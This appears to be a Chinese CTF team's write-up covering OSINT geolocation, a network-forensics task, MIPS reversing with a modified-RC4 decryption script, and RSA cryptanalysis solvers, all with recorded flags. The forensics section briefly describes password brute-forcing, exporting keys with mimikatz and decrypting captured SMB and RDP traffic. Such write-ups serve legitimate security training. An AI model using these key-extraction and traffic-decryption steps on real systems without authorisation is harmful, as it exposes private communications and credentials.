图中有个百安居,且旁边应该是一个购物商场之类的,同时观察路灯,猜测这是在上海,最后在龙阳路找到了
右边远处是一个机场的塔台,岔路口对面应该是一个中国航油的加油站,但是是白色的顶?在民航局查询运输机场,然后发现是成都双流国际机场旁边机场东三路。图中的加油站应该是没修好,百度地图上有这个建筑物,但没有显示名称。
百度搜图搜出来一张很像图片,是重庆谢家湾立交
图片原文链接http://mt.sohu.com/20161016/n470410292.shtml
106.524402,29.526177
一 99.974383,36.66725
二 121.567039,31.211279
三 103.966657,30.571185
四 120.293197,30.346334
五 106.524114,29.52509
六 118.783635,32.013335
七 112.969521,28.201853
八 121.734859,31.412815
九 114.412567,30.661017
十 120.308631,30.152785
谍影重重5
题目内容:
我国某部门已经连续三年对间谍张纪星进行秘密监控,最近其网络流量突然出现大量的神秘数据,为防止其向境外传送我国机密数据,我们已将其流量保存,请你协助我们分析其传输的秘密信息。
附件下载 提取码(GAME)备用下载
根据这个文章爆破密码
https://www.secpulse.com/archives/106276.html
解密smb流
导出所有对象 两个证书 一个flag.7z
找到如下文章
https://bbs.kanxue.com/thread-255173.htm
用密码mimikatz导出密钥
解开rdp协议
参考链接
https://res260.medium.com/ihack-2020-monster-inc-the-middle-rdp-network-forensics-writeup-91e2fb0f4287
重放获得密码解密flag.7z babygirl2339347013182
Reverse
mips
虚拟机逆向,下载下来qemu跑 有假opcode 出假flag
flag{reverse_dynamic}
真flag实际上藏在/emu的加密逻辑里。我们可以看到大概有两段加密逻辑
一段RC4,一段异或与位移的混合加密。分别在地址0x3DE7A9和0x33D8E0
在0x33D8E0藏着一段RC4的加密
手动去除花指令
花指令去除后得到
可以看到是魔改的RC4。这里拿到S盒和KEY以后接着往后看。
从0x3DE801可以看到有一段"flag{"头的格式校验
xref 往回看,去除花指令后这里实际上藏着两段加密
可以看到,此处是一个异或加密加一次位移
位移加密显而易见,可以直接看到逻辑是将data中的7和11互换,12和16互换。(func_swap)
异或这里不是很好看,但是因为是单数字异或所以可以爆破
编写解密脚本,解出(RC4解密直接找GPT写)
# Modified RC4 routine used to decode the recovered bytes.
def rc4_decode(data, key):
    """Apply the modified RC4 keystream and the fixed bit-mixing steps to *data*.

    *data* is updated in place and the resulting values are also returned as
    a new list. Besides the RC4 keystream byte, each position is XORed with
    an entry of the module-level ``keyb`` chosen by ``t & 3``.

    Args:
        data: Mutable sequence of integers to transform.
        key: Indexable sequence of integers used for the key schedule.

    Returns:
        List with the transformed value of every position.
    """
    # Key scheduling: permute the state array with the key.
    S = list(range(256))
    j = 0
    key_len = len(key)
    for i in range(256):
        j = (j + S[i] + key[i % key_len]) % 256
        S[i], S[j] = S[j], S[i]

    i = j = 0
    out = []
    for t, value in enumerate(data):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        # Keystream byte, plus the extra keyb XOR (the small modification).
        value ^= S[(S[i] + S[j]) % 256] ^ keyb[t & 3]
        # Additional fixed bit operations applied to every byte.
        value = (((value << 5) | (value >> 3)) ^ 0xDE) & 0xFF
        value = (((value << 4) | (value >> 4)) ^ 0xAD) & 0xFF
        value = (((value << 3) | (value >> 5)) ^ 0xBE) & 0xFF
        value = ((((value ^ 0x3B) << 2) | ((value ^ 0xC0) >> 6))) & 0xFF
        value = ((value << 1) | (value >> 7)) & 0xFF
        data[t] = value
        out.append(value)
    return out
# Data bytes and key material.
data = [0xC4, 0xEE, 0x3C, 0xBB, 0xE7, 0xFD, 0x67, 0x1D, 0xF8, 0x97, 0x68, 0x9D, 0xB, 0x7F, 0xC7, 0x80, 0xDF, 0xF9, 0x4B, 0xA0, 0x46, 0x91]
keyb = [0xDE, 0xAD, 0xBE, 0xEF]
key = '6105t3'.encode() # convert the string key to bytes
# Swap selected elements of data (positions 12/16 and 7/11).
data[12], data[16] = data[16], data[12]
data[7], data[11] = data[11], data[7]
# Run the modified RC4 routine.
dec = rc4_decode(data, key)
# Brute-force the single XOR value (1..99) and print every candidate that is
# pure ASCII and contains a closing brace.
for i in range(1, 100):
    a = ''.join([chr(x ^ i) for x in dec ])
    if a.isascii() and '}' in a:
        print(a)
输出
QeMu_r3v3rs3in9_h@ck6}
^jBzP}<y<}|<fa6PgOld9r
_kC{Q|=x=|}=g`7QfNme8s
YmE}Wz;~;z{;af1W`Hkc>u
ZnF~Ty8}8yx8be2TcKh`=v
DpX`Jg&c&gf&|{,J}Uv~#h
EqYaKf'b'fg'}z-K|Tw"i
Gs[cId%`%de%x/I~Vu} k
Bv^fLa e a` z}*L{Spx%n
O{SkAl-h-lm-wp'Av^}u(c
I}UmGj+n+jk+qv!GpX{s.e
sGoW}PTPQKLJbAI_
}IaYs^Z^_EBsDlOGQ
aU}EoBFBCY^ oXpS[M
lXpHbOKONTSbU}^V
@
! 1w2w67w-*}9
+;<}8}<=}' w&-%x3
.>9x=x98x"%r#
( }6
显然第一个是flag(没有flag头)
flag{QeMu_r3v3rs3in9_h@ck6}
Crypto
EasyRSA
❝easy的RSA。
https://pan.baidu.com/s/1oqmNif9L3zaGgJMNvrlckQ 提取码(GAME)
#encoding:utf-8
from Crypto.Util.number import long_to_bytes, bytes_to_long, getPrime
import random, gmpy2
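class RSAEncryptor:
    """Challenge generator: an RSA modulus whose primes share a large factor in p-1 and q-1.

    The primes have the form ``p = 2*g*a + 1`` and ``q = 2*g*b + 1`` with a
    500-bit prime ``g``, so ``N = p*q = 2*g*h + 1`` where
    ``h = 2*g*a*b + a + b``. Creating an instance generates the key, encrypts
    the contents of ``/flag`` and prints ``N``, ``e``, ``g`` and the
    ciphertext.

    NOTE(review): ``g`` divides both ``p-1`` and ``q-1`` and is printed by
    ``show()``; the solver that accompanies this listing relies on knowing it.
    """

    def __init__(self):
        self.g = self.a = self.b = 0
        self.e = 65537
        self.factorGen()
        self.product()

    def factorGen(self):
        """Search for g, a, b such that 2ga+1, 2gb+1 and h are all prime, then set N."""
        # OS-backed randomness rather than the default Mersenne Twister,
        # which is not intended for key material.
        rng = random.SystemRandom()
        while True:
            self.g = getPrime(500)
            # a and b start at 0 (2*g*0 + 1 == 1 is not prime), so both loops
            # draw at least once; after a new g they re-test the old values.
            while not gmpy2.is_prime(2*self.g*self.a+1):
                self.a = rng.randint(2**523, 2**524)
            while not gmpy2.is_prime(2*self.g*self.b+1):
                self.b = rng.randint(2**523, 2**524)
            self.h = 2*self.g*self.a*self.b+self.a+self.b
            if gmpy2.is_prime(self.h):
                self.N = 2*self.h*self.g+1
                print(len(bin(self.N)))
                return

    def encrypt(self, msg):
        """Return ``msg ** e mod N`` (textbook RSA, no padding)."""
        return gmpy2.powmod(msg, self.e, self.N)

    def product(self):
        """Read ``/flag``, encrypt it and print the public values and the ciphertext."""
        with open('/flag', 'rb') as f:
            self.flag = f.read()
        # f.read() returns bytes while powmod works on integers, so convert
        # with the already imported bytes_to_long before encrypting.
        self.enc = self.encrypt(bytes_to_long(self.flag))
        self.show()
        print(f'enc={self.enc}')

    def show(self):
        """Print N, e and g."""
        print(f"N={self.N}")
        print(f"e={self.e}")
        print(f"g={self.g}")


RSAEncryptor()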
参考https://hasegawaazusa.github.io/common-prime-rsa.html#%E7%94%9F%E6%88%90%E7%AE%97%E6%B3%95
from Crypto.Util.number import long_to_bytes, bytes_to_long, getPrime
import random, gmpy2
N=68181737436076529224562801475664297421729354212384041118703553655862954054390604345710204499672389859306230171439336751620692051642891341227511379742159778551509301729325926212030040953445232196672875614781992761633486842422763277359149614042100859799287161072975734377155654677838861451658435279911613496030174632772094600976623289395051692814762337022334904693262714503157142625354019950324235481018728283797128366923672374929302811892040002045357581088454106853192632046865605032932353925106145687276613086609216472031735150281366585771571092053452303427609476066826071699082450442010727647542422591413685012991847
e=65537
g=2727446902919970141730604198759853937077025270972540761838813887361413426265374291573543190662905624555591260123009922278536283328614119860275108794191
enc=22861546506055135213358174312554646492187230381898758188877170608117485697823358493902656822896995774774583447870634616151878506893600307136194448466391765676766649364517016807954203559422855990414639527101844069106007405310915954983002225014275471201621305566277481389231026040692035284000924899379960675354638203176299281188958081732877418895852360509500030058881789441137950812074377976972980617402981583206439462939115804475740461147572369766349241970070299606353350638491580474229665228427437979284493336214816411172283734295612780839157029963764634374109413111316530398201103686311906828987763255882793136411901
# Size parameters: nbits is the size of N and gamma the relative size of g
# (the generator draws a 500-bit g, and 500/2048 is about 0.244).
nbits = 2048
gamma = 0.244
cbits = ceil(nbits * (0.5 - 2 * gamma))
# N = 2*g*h + 1 with h = 2*g*a*b + (a + b), so M equals h.
M = (N - 1) // (2 * g)
# Divide h by 2*g: u = a*b + c and v = (a + b) - 2*g*c, where c = (a + b) // (2*g).
u = M // (2 * g)
v = M - 2 * g * u
GF = Zmod(N)
x = GF.random_element()
# y = x^(2g) has an order dividing a*b, hence y^u = y^(a*b + c) = y^c.
y = x ^ (2 * g)
# c is roughly of size N^(0.5 - 2*gamma); find it with a baby-step giant-step
# search restricted to that interval.
c = bsgs(y, y ^ u, (Integer(2**(cbits-1)), Integer(2**(cbits+1))))
# With c known, the product and the sum of a and b follow directly.
ab = u - c
apb = v + 2 * g * c
# a and b are the roots of x^2 - (a + b)*x + a*b.
P.<x> = ZZ[]
f = x ^ 2 - apb * x + ab
a = f.roots()
if a:
    a, b = a[0][0], a[1][0]
    p = 2 * g * a + 1
    q = 2 * g * b + 1
    assert p * q == N
    # Standard RSA decryption once the factors are known.
    d=gmpy2.invert(65537,(p-1)*(q-1))
    m=pow(enc,d,N)
    print(long_to_bytes(m))
#flag{819fbbea-be48-405b-8d63-d2e1ed26ddcb}
apbq
第一部分给了p+q,直接解方程组解pq,然后解rsa即可
from Crypto.Util.number import *
hints = 18978581186415161964839647137704633944599150543420658500585655372831779670338724440572792208984183863860898382564328183868786589851370156024615630835636170
public_key = (89839084450618055007900277736741312641844770591346432583302975236097465068572445589385798822593889266430563039645335037061240101688433078717811590377686465973797658355984717210228739793741484666628342039127345855467748247485016133560729063901396973783754780048949709195334690395217112330585431653872523325589, 65537)
enc1 = 23664702267463524872340419776983638860234156620934868573173546937679196743146691156369928738109129704387312263842088573122121751421709842579634121187349747424486233111885687289480494785285701709040663052248336541918235910988178207506008430080621354232140617853327942136965075461701008744432418773880574136247
# var("p q")
# solve([p+q==hints,p*q==public_key[0]],[p,q])
p=9944868810114216202051445555036732697046288141145767567362511367574668195172230525918426361043964814581009916352403620781997665604176512356634685730213779
q=9033712376300945762788201582667901247552862402274890933223144005257111475166493914654365847940219049279888466211924563086788924247193643667980945105422391
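# Private exponent for e = 65537. `inverse` comes from the star import of
# Crypto.Util.number; this listing never imports gmpy2, so gmpy2.invert would
# raise NameError when the script is run on its own.
d = inverse(65537, (p - 1) * (q - 1))
m = pow(enc1, d, public_key[0])
print(long_to_bytes(m))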
#flag{yOu_can_
第二部分参考这个题:https://github.com/josephsurin/my-ctf-challenges/tree/main/downunderctf-2023/apbq-rsa-ii
from Crypto.Util.number import *
import gmpy2
import itertools
hints = [18167664006612887319059224902765270796893002676833140278828762753019422055112981842474960489363321381703961075777458001649580900014422118323835566872616431879801196022002065870575408411392402196289546586784096, 16949724497872153018185454805056817009306460834363366674503445555601166063612534131218872220623085757598803471712484993846679917940676468400619280027766392891909311628455506176580754986432394780968152799110962, 17047826385266266053284093678595321710571075374778544212380847321745757838236659172906205102740667602435787521984776486971187349204170431714654733175622835939702945991530565925393793706654282009524471957119991, 25276634064427324410040718861523090738559926416024529567298785602258493027431468948039474136925591721164931318119534505838854361600391921633689344957912535216611716210525197658061038020595741600369400188538567, 22620929075309280405649238349357640303875210864208854217420509497788451366132889431240039164552611575528102978024292550959541449720371571757925105918051653777519219003404406299551822163574899163183356787743543, 20448555271367430173134759139565874060609709363893002188062221232670423900235907879442989619050874172750997684986786991784813276571714171675161047891339083833557999542955021257408958367084435326315450518847393, 16581432595661532600201978812720360650490725084571756108685801024225869509874266586101665454995626158761371202939602347462284734479523136008114543823450831433459621095011515966186441038409512845483898182330730, 23279853842002415904374433039119754653403309015190065311714877060259027498282160545851169991611095505190810819508498176947439317796919177899445232931519714386295909988604042659419915482267542524373950892662544, 16542280976863346138933938786694562410542429842169310231909671810291444369775133082891329676227328401108505520149711555594236523078258701726652736438397249153484528439336008442771240980575141952222517324476607, 
17054798687400834881313828738161453727952686763495185341649729764826734928113560289710721893874591843482763545781022050238655346441049269145400183941816006501187555169759754496609909352066732267489240733143973, 22115728663051324710538517987151446287208882441569930705944807337542411196476967586630373946539021184108542887796299661200933395031919501574357288914028686562763621166172668808524981253976089963176915686295217, 19324745002425971121820837859939938858204545496254632010818159347041222757835937867307372949986924646040179923481350854019113237172710522847771842257888083088958980783122775860443475680302294211764812636993025, 17269103712436870749511150569030640471982622900104490728908671745662264368118790999669887094371008536628103283985205839448583011077421205589315164079023370873380480423797655480624151812894997816254147210406492, 17365467616785968410717969747207581822018195905573214322728668902230086291926193228235744513285718494565736538060677324971757810325341657627830082292794517994668597521842723473167615388674219621483061095351780, 20823988964903136690545608569993429386847299285019716840662662829134516039366335014168034963190410379384987535117127797097185441870894097973310130525700344822429616024795354496158261293140438037100429185280939, 19068742071797863698141529586788871165176403351706021832743114499444358327620104563127248492878047796963678668578417711317317649158855864613197342671267006688211460724339403654215571839421451060657330746917459, 20089639597210347757891251257684515181178224404350699015820324544431016085980542703447257134320668961280907495580251880177990935443438799776252979843969984270461013888122703933975001704404129130156833542263882, 22344734326131457204500487243249860924828673944521980798994250859372628295695660076289343998351448667548250129358262592043131205967592613289260998148991388190917863322690137458448696392344738292233285437662495, 
22688858027824961235755458925538246922604928658660170686458395195714455094516952026243659139809095639584746977271909644938258445835519951859659822660413616465736923822988993362023001205350387354001389518742538, 21286046487289796335501643195437352334100195831127922478044197411293510360710188581314023052580692810484251118253550837525637065385439859631494533102244585493243972819369812352385425700028640641292410326514111, 21542729548465815605357067072323013570796657575603676418485975214641398139843537820643982914302122976789859817102498484496409546012119998359943274203338400776158986205776474024356567247508744784200354385060666, 22319592382753357951626314613193901130171847776829835028715915533809475362288873045184870972146269975570664009921662023590318988850871708674240304838922536028975978222603171333743353770676344328056539379240160, 25195209191944761648246874631038407055240893204894145709996399690807569652160721616011712739214434932639646688187304865397816188999592774874989401871300784534538762135830014255425391132306536883804201055992313, 18257804244956449160916107602212089869395886846990320452133193087611626919926796845263727422042179229606817439442521540784268169177331707314788427670112999551683927934427716554137597798283300120796277229509678, 20293403064916574136692432190836928681820834973375054705153628740577159076332283715581047503287766236543327123639746352358718218140738999496451259789097826888955418315455420948960832865750253988992454128969953, 15967654820584966012628708475666706277218484919923639492431538068059543232562431059752700377242326527417238151501168940191488179144049286512652111172149113549072003881460743035279388672984805823560897688895124, 25144187979876039024245879200325843092774389926620026124061775431569974232758799200333888039013494603721065709195353330350750055309315207499741437181094874894647736904055829877859906318073991986020178158776286, 
15736932921640444103019961538951409924080453868073105830403926861058056351553271238438325117113945341892868641345117717666354739204401152657265824568724844930574396801692131746182948347887298330990039956813130, 18831072673439732764722762485733622234889447953507582396819704359771208236721692820362137219509611319088756045211407777880521726782697895768017460064889670066178710804124631128581556314122255564861269062385337, 23800437561684813552661749774840752013501533683948618798811470214669024646396165487093720960221009038817909066075238937189371227098032581450466402462014437421254375846263830927945343485988463525070074913720710, 24402191070622494792723290726249952159888270689258801831518209605331984684494095167423722682814769395395011136124403802097229547003802312444913008194461779426175966774202219703164060353710247619639616444797670, 20215481513831963554421686543560596857659844027486522940060791775984622049024173363533378455076109165728144576719015392033536498353094895564917644840994662704362121549525329105205514332808950206092190939931448, 18384453917605955747212560280232547481041600196031285084598132475801990710125754705645482436436531608696373462641765399622296314590071558616193035939108523357020287896879479452040171765916716377102454266933226, 21890401344164908103930010123434944359446535642544335610455613014563290097498740447164765588532234051104173227090428486681237432196639010849051113283297943367655458678533223039415083212229970648958070799280218, 18379893441293694747570620009241814202936873442370354246029979042247705730610190888710981918183390028386451290137755339890329474403224043675724851314770861939082447728194632548864823398818221526652331319263027, 18715827130228986951360013590464775001019026913384718876134449689773600060962392738619405370033085704046027397895627933844824630723286144367800484157574548819065406118338665931032779491897783504790669824301288, 
13588739911708699123450670852772302012518315143187739886523841133752009403411431627334135210166268158490674049617489193734568451811305631563767138879895461211915128972052001136464325219117009268526575020143259, 18506039912943821193373920483847347155611306173368341979655092778147169768984477236224526786441466933360500418090210912574990962709452725122792963919616633389125605160796446674502416801964271004625701238202575, 22167985517547342184812919437069844889650448522260359154086923601900060998572245598167213217022051141570075284051615276464952346620430587694188548679895095556459804921016744713098882496174497693878187665372865, 21507363933875318987283059841465034113263466805329282129011688531718330888226928182985538861888698160675575993935166249701145994333840516459683763957425287811252135418288516497258724668090570720893589001392220, 20250321586608105267884665929443511322540360475552916143405651419034772061789298150974629817817611591100450468070842373341756704300393352252725859102426665187194754280129749402796746118608937061141768301995522, 16104259151024766025645778755951638093681273234415510444173981198301666343334808614748361662637508091511498829253677167171091582942780017355912433497214576425697459483727777273045993446283721290714044600814203, 14560242181138184594433372530956542527312169507277535425067427080573272033961044062335960097446781943943464713852520415535775461964590009720592053626735276833191667395201287169782350381649400286337671320581068, 16239347596615402699390026749150381714807445218767496868569282767673828662340774349530405347667558555781433774705139593469838946201218537641296949822639509296966092138954685186059819628696340121356660166937131, 21344472317634795288252811327141546596291633424850284492351783921599290478005814133560171828086405152298309169077585647189366292823613547973428250604674234857289341613448177246451956695700417432794886277704716, 
16053809990112020217624905718566971288375815646771826941011489252522755953750669513046736360397030033178139614200701025268874379439106827823605937814395162011464610496629969260310816473733828751702925621950679, 18917855883623050190154989683327838135081813638430345099892537186954876489710857473326920009412778140451855952622686635694323466827034373114657023892484639238914593012175120540210780102536003758794571846502397, 22690171278715056779052233972642657173540399024770527983659216197108042021644328773010698851143953503599329885607621773816718008861742027388432534850163666629476315340137626681994316866368449548292328156728206, 21087818524872480052313215092436868441694786060866149491087132591272640372512484925209820065536439188250579925233059144898601140234767300574307770064543499923712729705795392684173268461519802573563186764326797, 18439753470094841291394543396785250736332596497190578058698960152415339036714664835925822942784700917586270640813663002161425694392259981974491535370706560550540525510875465091384383255081297963169390777475352, 20105719699015744146039374208926740159952318391171137544887868739518535254000803811729763681262304539724253518465850883904308979964535242371235415049403280585133993732946919550180260852767289669076362115454200, 17251599484976651171587511011045311555402088003441531674726612079301412643514474016351608797610153172169183504289799345382527665445027976807805594288914226822374523878290416047130731166794970645275146679838899, 23027331991437585896233907022469624030630702237261170259290872847355304456043379238362120518409085840638396736666056992747627271193089116095167049248270541979716594671069985183070290375121270398623215587207529, 18158149685496169798299129683009221264185608469410295069411669832919646968324946121757411511373498747604679198739125835462814352243797919744572086307939585501566092705355693015625009717017077302201663788208609, 
18276153196656501517216055049560959047263892309902154534799806637704337317207294332426798932144785240877892837491213916540255237702169595754963908689566362060228840286531616263506272071630209104758589482803348, 19830654702835464289082520892939657653574451119898587213320188332842291005863699764597454403874285715252681820027919359194554863299385911740908952649966617784376852963552276558475217168696695867402522508290055, 15349828226638644963106414986240676364822261975534684137183044733508521003843559094515387144949811552173241406076270015291925943459603622043168219534080772937297911323165839870364550841685270125556125756627553, 20923687596111161976478930953796496927811701530608223491138786355445002217973253897724452954815797952200740069102515860924306246841340715110620719064010080520601890251137419840158983682372232110885549732743013, 21095748006022412831703352650023882351218414866517568822818298949510471554885207645049385966827210564667371665855668707424105040599599901165292360321667007968065708796593851653085339928947755081203265281357013, 20136320433636422315432754195821125224777716034031656342233368000257459497472596860252592531939146543685406198978058242599116859263546329669263543660114747385041549283367183026001454445297981439938401547228229, 16496919752274418275948572022974868132658743151124597724312835413857298109100258912203517423633396955060591787380445877361136405137884456764770035346437177846666365911942996404514058688909577420388537479730705, 13788728438272498164727737074811797093818033799836159894472736480763530670013682288670889124484670336660448907074673625466218166413315342420667608074179975422284472184048790475129281850298519112884101776426380, 24852871485448795332267345793743281093931161235481251209948049584749441451621572752080662697610253315331335180611651946374137068256112152253681972406000252076016099200912670370417045090034045383991812756120791, 
18663346319122078996775762643035864683521213720864038756854558668694021987970601131985163948257100423991091156649638455828855082098689641225427227191064496066436196910238564311309556938903101074363279783438714, 21400068681031931459396470039651524575262457489792894764406364952394476440804779651233022862527636114968325782197380721095406628084183336358459476006267416033892771932528688312375109463803215034905281657962293, 16044158155847172030103761204572942507195578382208455423846603003318483484698088948486132040995746837257705704187725306831142305215342467016564452582165866039427184607605673304595194959499145031211096109534167, 16518253246325822837502418827700493807621067058438396395472266350036385535241769917459657069911028720968654253735107131282350340465691670072304718987805883113410923109703284511709226857412404454224134480632696, 22032469066601123287586507039704080058983969235246539501189720236880312024198451198788699002335010120658564926677243708367430773661097221076615953342733896063909953602379936312639192315223258556134958059637605, 17474611942177808070315948910226643697957069578572244709354155010512694059987765040746148981545760660371360975936526076852619987733316042847813177383519241505024635332293992920023420060610648140841369822739716, 20097265939024591617239874622716452182434300498447992668997438018575636772416262543204370899462096267444545094719202447520254303983442269757551626971917981420832391886214473318353984504467919530676605744560570, 18170251482705061226968041449812078923477452841162650888922564215790088545936753453513162197661916172215859504545409274440450807677845894292177296835154674774694992388033874349807244020099167681146357128785394, 18084007437523118129421476751918491055914528331902780911288404344016551650138679157754567938593688369062981279371320169939281882307797009116458871503759873023914718337944953764426183937635379280572434676575757, 
17001811604221128900675671565539617923973183364469396458234914432162200119518252971721448274846235879320362924206656971472493711107677598961463553324277826426691784458674010708635756004550789902368338633272118, 20217009574515126619724139485885721324936960849401637840860565569588595992087537454744066905387396266844236387315004915383456736142307523960394594650088663019228826091309049211780607761862663242437656610298243, 25534440916970201550118006203706860249111087748000550226680885431006136131742280963090650607632467666558508520152535105122661615376298673454198064361094319699307084117001019115669670029195171047304283891069792, 18871869316294018605789169171879572816494092699556970507058691345095743053290043643010965660058888064972257990750611470141816041727746767146945121588515830427165739580791663951175220638901672353681640741068573, 20173968537913641339915058056878181363456579537994317562789857397928196160113042659777558550242315788417022891612723148843142958668959046890197219991727894451795438138592005695329607326086644956073759609743066, 20601943394990265144021144365970164017319737300436518536503270346147112565303361487668388700369636611354280332841812324530501569200031186584749278453651172121161814207025650519637781007286435981682228528706305, 16397528630087028144645213166977866073543422560337716097539091258081008408890966764995645782823950721804205427713461441138000880478364026137452291234097219085473748076681729365744710225699866258812642458184750, 21373350333568141000876969785296802670776508778278005158047105058430550665787088265486222905402690421155861103648370249249790560185790723042867282734693553039477436055775198037042047438047898227097749354619822, 17767469767416052322357795736899648760868316512079849340028040817353808899589201201338152114229279980849491049574543361275046276135253417685681262008211582060955974064559129311524323185960856955462761555353091, 
22148352529815091269441663541923247974004854058764556809596705832663604786920964849725772666340437231503146814919702525852955831173047034475925578238466977606367380212886384487294569287202762127531620290162734, 21663842528026621741414050256553652815372885707031383713657826718944735177083300302064509342116651731671570591336596953911570477161536730982887182434407761036442993588590230296643001682944654490645815177777455, 20219077358929317461660881724990436334639078047412693497584358963241840513748365548465302817975329987854784305275832045889690022909383530837382543579292451297269623663257098458645056099201050578472103957851128, 18255302182526662903763852563401346841065939531070045000414364747445988455597258924280193695407035356029557886165605853810182770534711966292253269625917149411889979307227493949293798772727125069093642134972336, 24926064145128749429079117171467042019887257504329103038171762786986349157515552927216574990423327013202735544601170247730647598931030432792167867343343213411600516855009788294067588153504026267213013591793027, 22369607314724468760253123915374991621544992437057652340350735935680183705467064876346663859696919167243522648029531700630202188671406298533187087292461774927340821192866797400987231509211718089237481902671100, 16994227117141934754898145294760231694287000959561775153135582047697469327393472840046006353260694322888486978811557952926229613247229990658445756595259401269267528233642142950389040647504583683489067768144570, 21758885458682118428357134100118546351270408335845311063139309657532131159530485845186953650675925931634290182806173575543561250369768935902929861898597396621656214490429009706989779345367262758413050071213624, 20156282616031755826700336845313823798147854495428660743884481573484471099887576514309769978525225369254700468742981099548840277532978306665910844928986235042420698332201264764734685502001234369189521332392642, 
23291765247744127414491614915358658114280269483384022733002965612273627987872443453777028006606037159079637857473229879140366385523633075816362547967658930666106914269093225208138749470566410361196451552322613, 19807792217079652175713365065361659318870738952921195173619551645956745050506271953949139230097128034416815169649874760890189515620232505703162831090225715453502422905418824316957257395992121750661389503495033, 22074209373194902539215367382758486068533032275912313703269990627206774967653336496619231924013216321042649461711292555464574124714934511202231319963361912937842068483700298097209400217869036338644607607557860, 19678336511265998427322297909733474384702243426420286924671444552444079816707773485084891630780465895504253899943221044355971296122774264925882685351095921532685536165514189427245840338009573352081361238596378, 24746314790210393213546150322117518542380438001687269872679602687597595933350510598742749840102841364627647151669428936678130556027300886850086220074563664367409218038338623691372433831784916816798993162471163, 19346137206512895254202370018555139713690272833895195472766704715282164091959131850520571672509601848193468792313437642997923790118115476212663296111963644011010744006086847599108492279986468255445160241848708, 22739514514055088545643169404630736699361136323546717268615404574809011342622362833245601099992039789664042350284789853188040159950619203242924511038681127008964592137006103547262538912024671048254652547084347, 21491512279698208400974501713300096639215882495977078132548631606796810881149011161903684894826752520167909538856354238104288201344211604223297924253960199754326239113862002469224042442018978623149685130901455, 19381008151938129775129563507607725859173925946797075261437001349051037306091047611533900186593946739906685481456985573476863123716331923469386565432105662324849798182175616351721533048174745501978394238803081, 
19965143096260141101824772370858657624912960190922708879345774507598595008331705725441057080530773097285721556537121282837594544143441953208783728710383586054502176671726097169651121269564738513585870857829805]
n,e = (73566307488763122580179867626252642940955298748752818919017828624963832700766915409125057515624347299603944790342215380220728964393071261454143348878369192979087090394858108255421841966688982884778999786076287493231499536762158941790933738200959195185310223268630105090119593363464568858268074382723204344819, 65537)
enc2 = 30332590230153809507216298771130058954523332140754441956121305005101434036857592445870499808003492282406658682811671092885592290410570348283122359319554197485624784590315564056341976355615543224373344781813890901916269854242660708815123152440620383035798542275833361820196294814385622613621016771854846491244
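# Part 2 of "apbq" (Sage): recover a multiple of q from the first four hints
# with two rounds of LLL, then finish the RSA decryption.
# NOTE(review): the hint generator is not shown on this page. The comments
# below assume, as in the referenced apbq-rsa-ii challenge, that
# hints[i] = a_i*p + b_i*q with small a_i, b_i -- confirm against the task.

V = hints[:4]
k = 2^800  # Sage power operator; large weight that forces exact relations

# Round 1: rows of [k*v_i | I]. After LLL the identity part (b[1:]) of each
# reduced row is a short integer vector; the heavy weight k pushes the short
# ones towards sum(c_i * v_i) == 0, i.e. orthogonal to V.
M = Matrix.column([k * v for v in V]).augment(Matrix.identity(len(V)))
B = [b[1:] for b in M.LLL()]

# Round 2: take the first len(V)-2 reduced vectors and look for vectors
# orthogonal to them. Only rows whose weighted part is exactly zero qualify.
M = (k * Matrix(B[:len(V)-2])).T.augment(Matrix.identity(len(V)))
B = [b[-len(V):] for b in M.LLL() if set(b[:len(V)-2]) == {0}]
if len(B) < 2:
    raise ValueError("second LLL round did not yield two orthogonal vectors")

# Small combinations of the two surviving vectors are tried as candidate
# coefficient vectors (a1..a4). Under the assumed hint structure,
# a1*hints[1] - a2*hints[0] loses its p term, so its gcd with n exposes q
# (possibly times a small cofactor).
for s, t in itertools.product(range(4), repeat=2):
    T = s*B[0] + t*B[1]
    a1, a2, a3, a4 = T
    kq = gcd(a1 * hints[1] - a2 * hints[0], n)
    if 1 < kq < n:
        print('find!', kq, s, t)
        break
else:
    # Without this guard the script would continue with kq == 1 or kq == n and
    # fail later with an unrelated modular-inverse error.
    raise ValueError("no (s, t) combination produced a non-trivial gcd with n")

# Strip small cofactors so that only the prime q is left.
for i in range(2**16, 1, -1):
    if kq % i == 0:
        kq //= i

q = int(kq)
p = int(n // kq)
if p * q != n:
    raise ValueError("recovered factors do not multiply back to n")

d = pow(0x10001, -1, (p - 1) * (q - 1))
m = pow(enc2, d, n)
flag= long_to_bytes(m).decode()
print(flag)
# Expected output (second flag fragment, as recorded by the author): s0lve_the_@pb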
第三部分参考这个题:https://blog.maple3142.net/2024/05/28/angstromctf-2024-writeups/
但是按这个思路解出来不对,后来发现 enc3 实际上是用第二部分的 RSA 密钥(同一个 n)加密的,所以直接用上一步求出的 d 解密就好。
# Part 3 of "apbq": per the write-up, enc3 was encrypted under the same RSA key
# as part 2, so the private exponent d recovered there (pasted below together
# with that modulus n) decrypts it directly.
enc3 = 17737974772490835017139672507261082238806983528533357501033270577311227414618940490226102450232473366793815933753927943027643033829459416623683596533955075569578787574561297243060958714055785089716571943663350360324047532058597960949979894090400134473940587235634842078030727691627400903239810993936770281755
d = 63161710023005682001641222387261908738600679768601303308593545341859788186928800467532061832081889220655732875520328593226116199528042689465519293752965146159007213214854517385876812127128763146579744489192395430402667797637566878199509162723122664866142409202723436205520130646241903926144243067536101288033
n = 73566307488763122580179867626252642940955298748752818919017828624963832700766915409125057515624347299603944790342215380220728964393071261454143348878369192979087090394858108255421841966688982884778999786076287493231499536762158941790933738200959195185310223268630105090119593363464568858268074382723204344819

# Textbook RSA decryption, then big-endian integer -> bytes.
plain = pow(enc3, d, n)
print(long_to_bytes(plain))
# Output recorded by the author (last flag fragment): q_prob1em!!}
21_steps
计算一个128bit数的汉明权重,找到了这篇文章:https://blog.csdn.net/nazeniwaresakini/article/details/107892004 ,里面实现的是64bit的,根据相同的思想做一个扩展就能实现128bit的计算。下面payload中的三个十进制掩码分别是128bit的0x5555…5555、0x3333…3333和0x0F0F…0F0F,最后的 &127 取出最终的计数值。
最终payload
B=A>>1;B=B&113427455640312821154458202477256070485;A=A-B;B=A&68056473384187692692674921486353642291;A=A>>2;A=A&68056473384187692692674921486353642291;A=A+B;B=A>>4;A=A+B;A=A&20016609818878733144904388672456953615;B=A>>8;A=A+B;B=A>>16;A=A+B;B=A>>32;A=A+B;B=A>>64;A=A+B;A=A&127;
作者
CTF战队
ctf.wgpsec.org